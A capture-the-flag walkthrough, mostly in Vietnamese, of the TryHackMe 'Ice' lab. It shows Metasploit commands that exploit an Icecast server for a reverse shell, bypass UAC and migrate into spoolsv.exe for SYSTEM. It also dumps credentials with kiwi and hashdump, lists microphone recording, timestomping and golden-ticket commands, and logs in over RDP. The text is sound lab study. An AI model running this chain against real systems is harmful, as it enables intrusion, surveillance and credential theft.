Ice - Tryhackme

 

Connect to the TryHackMe network! Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.

-----------------------------------------

The virtual machine used in this room (Ice) can be downloaded for offline usage from https://darkstar7471.com/resources.html. The sequel to this room, Blaster, can be found here.

Bài này khai thác lỗ hổng ice trên window về việc thực thi mã từ xa điều khiến máy chủ window

Bước 1: Thu thập thông tin

Scan and enumerate our victim!

Sử dụng công cụ nmap

nmap -sV -sC -Pn -T4 ip_victim                

Thu được các cổng dịch vụ 138,129,445,3389,5357,8000,.... mình để ý nó dùng một dịch vụ

là  Icecast Streaming Media Server trên cổng 8000 và thu được hostname thiết bị là Drank-PC

Mình lên mạng tìm kiếm và biết có một lỗi hổng liên quan đến icecast là CVE-2004-1561

Bước 2: Thử khai thác lỗ hổng 

Sau khi biết thông tin lỗ hổng này mình mở công cụ metaploit trên kali và tìm kiến lỗ hổng icecast

Mình thực hiện lệnh sau:

use 0                 
set rhosts ip_victime 
set lhost ip_vpn_kali 

Sau đó mình chạy lệnh khai thác, thành công xâm nhập vào hệ thống 

Mình thu thập lấy  thông tin hệ điều hành và user hiện tại 

Bước 3:  Leo thang

Enumerate the machine and find potential privilege escalation paths to gain Admin powers!

Sau đó mình sử dụng local_exploit_suggester để tìm kiếm xem có cách nào khai thác leo thang không

run post/multi/recon/local_exploit_suggester

Thu được mã khai thác bypassuac_eventvwr mình sẽ thoát phiên này bằng ctrl+z sau đó sử dụng mã khai thác bypassuac_eventvwr

Kiểm tra phiên tấn công vừa rồi với mã khai thác icecast

run exploit/windows/local/bypassuac_eventvwr

Thêm thông tin:

set session session_id
set lhost ip_vpn_kali

Sau đó chạy mã khai thác, khi vào trong hệ thống chạy lệnh

getprivs

Phát hiện ra được SeTakeOwnershipPrivilege có thể sử dụng để leo thang

Bước 4: Khai thác khi sau khi thực hiện leo thang

Learn how to gather additional credentials and crack the saved hashes on the machine.

Mình sử dụng lệnh ps để kiểm tra các process của hệ thống và phát hiện 1268 spoolsv.exe 

Thông thường, khi tiếp quản một chương trình đang chạy, cuối cùng chúng ta cần tải một thư viện được chia sẻ khác vào chương trình (dll) có chứa mã độc hại. Từ đó, chúng ta có thể sinh ra một luồng mới kết nối điều kiển. Chương trình này là mã thực thi bởi mã độc khai thác bypassuac_eventvwr

Sau đó mình sẽ thực hiện chuyển quyền lên  NT AUTHORITY\SYSTEM sử dụng lệnh

migrate <PID_OF_spoolsv.exe>

getuid

Sau đó mình sẽ sử dụng tập lệnh sau để lấy thông tin đăng nhập RDP

load kiwi
creds_all

Thu được thông tin về mật khẩu user

Sử dụng thêm một số lệnh khai thác

hashdump

screenshare

record_mic

timestomp

golden_ticket_create

Lệnh này để tạo cấp phép cho phép user  được đăng nhập qua RDP

Bước 5: Xem kết quả

Explore post-exploitation actions we can take on Windows.

Đăng nhập remote desktop với thông tin thu được ở trên

rdesktop ip_victim

Sử dụng thông tin mật khẩu vừa rồi

Kiểm tra